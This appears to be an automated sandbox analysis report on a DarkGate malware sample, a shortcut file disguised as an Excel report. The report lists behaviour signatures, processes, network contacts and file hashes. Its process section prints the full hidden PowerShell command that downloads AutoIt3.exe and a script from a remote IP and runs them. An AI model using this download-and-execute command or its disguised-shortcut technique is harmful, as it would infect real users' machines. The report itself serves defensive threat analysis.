Analysis Overview
SHA256
06cc011f34188a2156c18c1307fd625ac9a2ed916a4c7e01b40513a826bd24d0
Threat Level: Known bad
The file All-Ftds-Report.xlsx.lnk was found to be: Known bad.
Malicious Activity Summary
DarkGate
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Enumerates physical storage devices
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-26 23:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-26 23:22
Reported
2023-10-26 23:32
Platform
win10-20231025-en
Max time kernel
315s
Max time network
389s
Command Line
Signatures
DarkGate
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Public\AutoIt3.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Public\AutoIt3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Public\AutoIt3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 2988 wrote to memory of 4900 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2988 wrote to memory of 4900 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4900 wrote to memory of 1824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Public\AutoIt3.exe |
| PID 4900 wrote to memory of 1824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Public\AutoIt3.exe |
| PID 4900 wrote to memory of 1824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Public\AutoIt3.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\All-Ftds-Report.xlsx.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "&{ Invoke-WebRequest -Uri "http:/\194.26.192.233/AutoIt3.exe" -OutFile "C:\Users\Public\AutoIt3.exe"; Invoke-WebRequest -Uri "http:/\194.26.192.233/bone.au3" -OutFile "C:\Users\Public\bone.au3"; Invoke-WebRequest -Uri "http://194.26.192.233/document.xlsx" -OutFile "C:\Users\Public\Documents\document.xlsx"; "C:\Users\Public\AutoIt3.exe C:\Users\Public\bone.au3"; C:\Users\Public\Documents\document.xlsx }"
C:\Users\Public\AutoIt3.exe
"C:\Users\Public\AutoIt3.exe" C:\Users\Public\bone.au3
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| NL | 194.26.192.233:80 | 194.26.192.233 | tcp |
| US | 8.8.8.8:53 | 233.192.26.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.178.238.8.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yohd21gr.fki.ps1
| Hash | Value |
|---|---|
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Public\AutoIt3.exe
| Hash | Value |
|---|---|
| MD5 | c56b5f0201a3b3de53e561fe76912bfd |
| SHA1 | 2a4062e10a5de813f5688221dbeb3f3ff33eb417 |
| SHA256 | 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d |
| SHA512 | 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c |
C:\Users\Public\bone.au3
| Hash | Value |
|---|---|
| MD5 | df26679034f7cb5a69fd065e54dc5fc0 |
| SHA1 | 4a7a998ac1f903378f446d902f1be05c23772965 |
| SHA256 | 7f0624141092f91ca74a6bf5c51408b445224ed6e504329acb04fee609a897cd |
| SHA512 | 81f41adf9bd72fe51ae8c3f4914c30d4533594afb1f11438d389319fa94a9fac691cd718c2cb1ab75cc2d877805a8c899af6d0dd5ad1b2634c2fd7fc5ad326eb |